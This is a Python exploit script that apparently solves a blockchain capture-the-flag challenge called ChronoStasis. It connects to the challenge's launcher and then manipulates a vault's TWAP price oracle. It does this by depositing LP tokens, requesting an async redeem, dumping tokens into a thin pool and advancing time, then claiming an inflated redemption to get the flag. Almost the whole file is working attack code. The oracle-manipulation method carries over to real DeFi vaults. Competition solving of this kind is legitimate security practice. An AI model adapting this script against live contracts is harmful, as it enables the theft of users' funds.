#!/usr/bin/env python3
from __future__ import annotations

import argparse
import os
import re
import socket
import sys
import time
from dataclasses import dataclass
from typing import Any

from eth_account import Account
from web3 import Web3


MENU_HOST = "1.95.63.227"
MENU_PORT = 7000
MAX_UINT = 2**256 - 1
DEADLINE = 9_999_999_999


SETUP_ABI = [
    {"type": "function", "name": "vault", "inputs": [], "outputs": [{"type": "address"}], "stateMutability": "view"},
    {"type": "function", "name": "oracle", "inputs": [], "outputs": [{"type": "address"}], "stateMutability": "view"},
    {"type": "function", "name": "router", "inputs": [], "outputs": [{"type": "address"}], "stateMutability": "view"},
    {"type": "function", "name": "tokenA", "inputs": [], "outputs": [{"type": "address"}], "stateMutability": "view"},
    {"type": "function", "name": "tokenB", "inputs": [], "outputs": [{"type": "address"}], "stateMutability": "view"},
    {"type": "function", "name": "tokenC", "inputs": [], "outputs": [{"type": "address"}], "stateMutability": "view"},
    {"type": "function", "name": "pairAB", "inputs": [], "outputs": [{"type": "address"}], "stateMutability": "view"},
    {"type": "function", "name": "pairBC", "inputs": [], "outputs": [{"type": "address"}], "stateMutability": "view"},
    {"type": "function", "name": "isSolved", "inputs": [], "outputs": [{"type": "bool"}], "stateMutability": "view"},
]

ERC20_ABI = [
    {"type": "function", "name": "approve", "inputs": [{"type": "address"}, {"type": "uint256"}], "outputs": [{"type": "bool"}], "stateMutability": "nonpayable"},
    {"type": "function", "name": "balanceOf", "inputs": [{"type": "address"}], "outputs": [{"type": "uint256"}], "stateMutability": "view"},
]

ROUTER_ABI = [
    {
        "type": "function",
        "name": "addLiquidity",
        "inputs": [
            {"type": "address"},
            {"type": "address"},
            {"type": "uint256"},
            {"type": "uint256"},
            {"type": "uint256"},
            {"type": "uint256"},
            {"type": "address"},
            {"type": "uint256"},
        ],
        "outputs": [{"type": "uint256"}, {"type": "uint256"}, {"type": "uint256"}],
        "stateMutability": "nonpayable",
    },
    {
        "type": "function",
        "name": "swapExactTokensForTokens",
        "inputs": [
            {"type": "uint256"},
            {"type": "uint256"},
            {"type": "address[]"},
            {"type": "address"},
            {"type": "uint256"},
        ],
        "outputs": [{"type": "uint256[]"}],
        "stateMutability": "nonpayable",
    },
]

VAULT_ABI = [
    {"type": "function", "name": "deposit", "inputs": [{"type": "uint256"}, {"type": "address"}], "outputs": [{"type": "uint256"}], "stateMutability": "nonpayable"},
    {"type": "function", "name": "balanceOf", "inputs": [{"type": "address"}], "outputs": [{"type": "uint256"}], "stateMutability": "view"},
    {"type": "function", "name": "pricePerShare", "inputs": [], "outputs": [{"type": "uint256"}], "stateMutability": "view"},
    {"type": "function", "name": "lpPriceUSD", "inputs": [], "outputs": [{"type": "uint256"}], "stateMutability": "view"},
    {
        "type": "function",
        "name": "requestRedeem",
        "inputs": [{"type": "uint256"}, {"type": "address"}, {"type": "address"}],
        "outputs": [{"type": "uint256"}],
        "stateMutability": "nonpayable",
    },
    {"type": "function", "name": "claimRedeem", "inputs": [{"type": "uint256"}], "outputs": [{"type": "uint256"}], "stateMutability": "nonpayable"},
]

ORACLE_ABI = [
    {"type": "function", "name": "update", "inputs": [{"type": "address"}], "outputs": [], "stateMutability": "nonpayable"},
]


@dataclass
class Instance:
    rpc: str
    private_key: str
    setup: str
    sock: socket.socket | None = None


def recv_some(sock: socket.socket, timeout: float = 2.0) -> str:
    sock.settimeout(timeout)
    out = b""
    while True:
        try:
            chunk = sock.recv(8192)
        except socket.timeout:
            break
        if not chunk:
            break
        out += chunk
    return out.decode(errors="replace")


def parse_instance(text: str) -> Instance:
    rpc_match = re.search(r"(?:RPC(?:\s+(?:URL|Endpoint))?|rpc)\s*[:=>-]+\s*(https?://[^\s]+)", text, re.I)
    pk_match = re.search(r"(?:Private Key|PK|private_key)\s*[:=>-]+\s*(0x[a-fA-F0-9]{64})", text, re.I)
    setup_match = re.search(r"(?:Setup(?:\s+(?:Address|Contract))?|setup)\s*[:=>-]+\s*(0x[a-fA-F0-9]{40})", text, re.I)
    if not (rpc_match and pk_match and setup_match):
        print(text)
        raise RuntimeError("Could not parse RPC / Private Key / Setup from launcher output")
    return Instance(rpc=rpc_match.group(1), private_key=pk_match.group(1), setup=setup_match.group(1))


def launch_instance(team_token: str) -> Instance:
    sock = socket.create_connection((MENU_HOST, MENU_PORT), timeout=10)
    banner = recv_some(sock)
    print(banner, end="")
    sock.sendall(b"2\n")
    time.sleep(0.2)
    prompt = recv_some(sock)
    print(prompt, end="")
    sock.sendall((team_token.strip() + "\n").encode())
    time.sleep(5)
    output = recv_some(sock, timeout=5)
    print(output, end="")
    instance = parse_instance(output)
    instance.sock = sock
    return instance


def get_flag(sock: socket.socket, team_token: str | None) -> str:
    sock.sendall(b"3\n")
    time.sleep(0.5)
    output = recv_some(sock, timeout=3)
    if "Team token" in output and team_token:
        print(output, end="")
        sock.sendall((team_token.strip() + "\n").encode())
        time.sleep(2)
        output += recv_some(sock, timeout=3)
    return output


def contract(w3: Web3, addr: str, abi: list[dict[str, Any]]) -> Any:
    return w3.eth.contract(address=Web3.to_checksum_address(addr), abi=abi)


def raw_signed_tx(signed: Any) -> bytes:
    raw = getattr(signed, "rawTransaction", None)
    if raw is None:
        raw = getattr(signed, "raw_transaction")
    return raw


def send_tx(w3: Web3, acct: Any, fn: Any, label: str) -> Any:
    sender = acct.address
    params: dict[str, Any] = {
        "from": sender,
        "nonce": w3.eth.get_transaction_count(sender),
        "chainId": w3.eth.chain_id,
    }
    try:
        params["gas"] = int(fn.estimate_gas({"from": sender}) * 1.5) + 50_000
    except Exception as exc:
        print(f"[!] gas estimate failed for {label}: {exc}; using 5,000,000")
        params["gas"] = 5_000_000
    try:
        params["gasPrice"] = w3.eth.gas_price
    except Exception:
        params["gasPrice"] = 1

    tx = fn.build_transaction(params)
    signed = acct.sign_transaction(tx)
    tx_hash = w3.eth.send_raw_transaction(raw_signed_tx(signed))
    print(f"[*] {label}: {tx_hash.hex()}")
    receipt = w3.eth.wait_for_transaction_receipt(tx_hash, timeout=120)
    if receipt.status != 1:
        raise RuntimeError(f"{label} reverted in tx {tx_hash.hex()}")
    return receipt


def mine_after(w3: Web3, seconds: int) -> None:
    w3.provider.make_request("evm_increaseTime", [seconds])
    w3.provider.make_request("evm_mine", [])


def solve(instance: Instance, lp_amount: int, wait_seconds: int, claim_id_override: int | None) -> bool:
    w3 = Web3(Web3.HTTPProvider(instance.rpc, request_kwargs={"timeout": 20}))
    if not w3.is_connected():
        raise RuntimeError(f"RPC not reachable: {instance.rpc}")

    acct = Account.from_key(instance.private_key)
    player = Web3.to_checksum_address(acct.address)
    print(f"[*] player={player}")
    print(f"[*] chain_id={w3.eth.chain_id}")

    setup = contract(w3, instance.setup, SETUP_ABI)
    vault_addr = setup.functions.vault().call()
    oracle_addr = setup.functions.oracle().call()
    router_addr = setup.functions.router().call()
    token_a = setup.functions.tokenA().call()
    token_b = setup.functions.tokenB().call()
    token_c = setup.functions.tokenC().call()
    pair_ab = setup.functions.pairAB().call()
    pair_bc = setup.functions.pairBC().call()

    for name, addr in [
        ("vault", vault_addr),
        ("oracle", oracle_addr),
        ("router", router_addr),
        ("tokenA", token_a),
        ("tokenB", token_b),
        ("tokenC", token_c),
        ("pairAB", pair_ab),
        ("pairBC", pair_bc),
    ]:
        print(f"[*] {name}={Web3.to_checksum_address(addr)}")

    vault = contract(w3, vault_addr, VAULT_ABI)
    oracle = contract(w3, oracle_addr, ORACLE_ABI)
    router = contract(w3, router_addr, ROUTER_ABI)
    tka = contract(w3, token_a, ERC20_ABI)
    tkb = contract(w3, token_b, ERC20_ABI)
    tkc = contract(w3, token_c, ERC20_ABI)
    lp_ab = contract(w3, pair_ab, ERC20_ABI)

    print("[*] approve tokens to router")
    send_tx(w3, acct, tka.functions.approve(router_addr, MAX_UINT), "approve TKA")
    send_tx(w3, acct, tkb.functions.approve(router_addr, MAX_UINT), "approve TKB")
    send_tx(w3, acct, tkc.functions.approve(router_addr, MAX_UINT), "approve TKC")

    print(f"[*] add liquidity A/B amount={lp_amount}")
    send_tx(
        w3,
        acct,
        router.functions.addLiquidity(token_a, token_b, lp_amount, lp_amount, 0, 0, player, DEADLINE),
        "addLiquidity A/B",
    )

    lp_bal = lp_ab.functions.balanceOf(player).call()
    print(f"[*] player LP={lp_bal}")
    if lp_bal <= 0:
        raise RuntimeError("No A/B LP minted")

    print("[*] deposit LP into vault")
    send_tx(w3, acct, lp_ab.functions.approve(vault_addr, MAX_UINT), "approve LP")
    send_tx(w3, acct, vault.functions.deposit(lp_bal, player), "vault deposit")

    shares = vault.functions.balanceOf(player).call()
    print(f"[*] shares={shares}")
    if shares <= 0:
        raise RuntimeError("No vault shares minted")

    print("[*] make oracle history valid")
    mine_after(w3, 2)
    send_tx(w3, acct, oracle.functions.update(pair_ab), "oracle update pairAB initial")
    send_tx(w3, acct, oracle.functions.update(pair_bc), "oracle update pairBC initial")

    pps = vault.functions.pricePerShare().call()
    lp_price_before = vault.functions.lpPriceUSD().call()
    print(f"[*] snapshot pps={pps}")
    print(f"[*] lp price before={lp_price_before}")

    if claim_id_override is None:
        try:
            request_id = vault.functions.requestRedeem(shares, player, player).call({"from": player})
        except Exception as exc:
            print(f"[!] could not pre-call requestRedeem id: {exc}; assuming 0")
            request_id = 0
    else:
        request_id = claim_id_override

    print(f"[*] request async redeem, expected requestId={request_id}")
    send_tx(w3, acct, vault.functions.requestRedeem(shares, player, player), "requestRedeem")

    b_bal = tkb.functions.balanceOf(player).call()
    print(f"[*] remaining TKB={b_bal}")
    if b_bal <= 0:
        raise RuntimeError("No TKB left to dump into B/C pool")

    print("[*] dump remaining TKB into thin B/C pool")
    send_tx(
        w3,
        acct,
        router.functions.swapExactTokensForTokens(b_bal, 0, [token_b, token_c], player, DEADLINE),
        "swap TKB->TKC",
    )

    print(f"[*] wait {wait_seconds}s for manipulated TWAP")
    mine_after(w3, wait_seconds)

    print("[*] update oracle observations after manipulation")
    send_tx(w3, acct, oracle.functions.update(pair_ab), "oracle update pairAB after")
    send_tx(w3, acct, oracle.functions.update(pair_bc), "oracle update pairBC after")

    lp_price_after = vault.functions.lpPriceUSD().call()
    print(f"[*] lp price after={lp_price_after}")

    claim_ids = [int(request_id)]
    if claim_id_override is None:
        claim_ids.extend(i for i in range(5) if i not in claim_ids)

    last_exc: Exception | None = None
    for claim_id in claim_ids:
        try:
            print(f"[*] claim redeem requestId={claim_id}")
            send_tx(w3, acct, vault.functions.claimRedeem(claim_id), f"claimRedeem {claim_id}")
            last_exc = None
            break
        except Exception as exc:
            print(f"[!] claimRedeem({claim_id}) failed: {exc}")
            last_exc = exc
    if last_exc is not None:
        raise last_exc

    solved = setup.functions.isSolved().call()
    print(f"[*] solved={solved}")
    return bool(solved)


def main() -> int:
    parser = argparse.ArgumentParser(description="ChronoStasis async redeem exploit")
    parser.add_argument("--team-token", default=os.environ.get("TEAM_TOKEN"), help="launcher team token")
    parser.add_argument("--rpc", default=os.environ.get("RPC"), help="challenge RPC URL")
    parser.add_argument("--pk", default=os.environ.get("PK"), help="player private key")
    parser.add_argument("--setup", default=os.environ.get("SETUP"), help="Setup contract address")
    parser.add_argument("--lp-amount", type=int, default=1000 * 10**18)
    parser.add_argument("--wait", type=int, default=360, help="TWAP manipulation wait time")
    parser.add_argument("--claim-id", type=int, default=None)
    args = parser.parse_args()

    menu_sock: socket.socket | None = None
    team_token = args.team_token

    if args.rpc and args.pk and args.setup:
        instance = Instance(args.rpc, args.pk, args.setup)
    elif team_token:
        instance = launch_instance(team_token)
        menu_sock = instance.sock
    else:
        print("Need either --team-token/TEAM_TOKEN or --rpc --pk --setup", file=sys.stderr)
        return 2

    solved = solve(instance, args.lp_amount, args.wait, args.claim_id)
    if solved and menu_sock is not None:
        print("[*] requesting flag from menu")
        flag_output = get_flag(menu_sock, team_token)
        print(flag_output, end="")
    if menu_sock is not None:
        menu_sock.close()
    return 0 if solved else 1


if __name__ == "__main__":
    raise SystemExit(main())
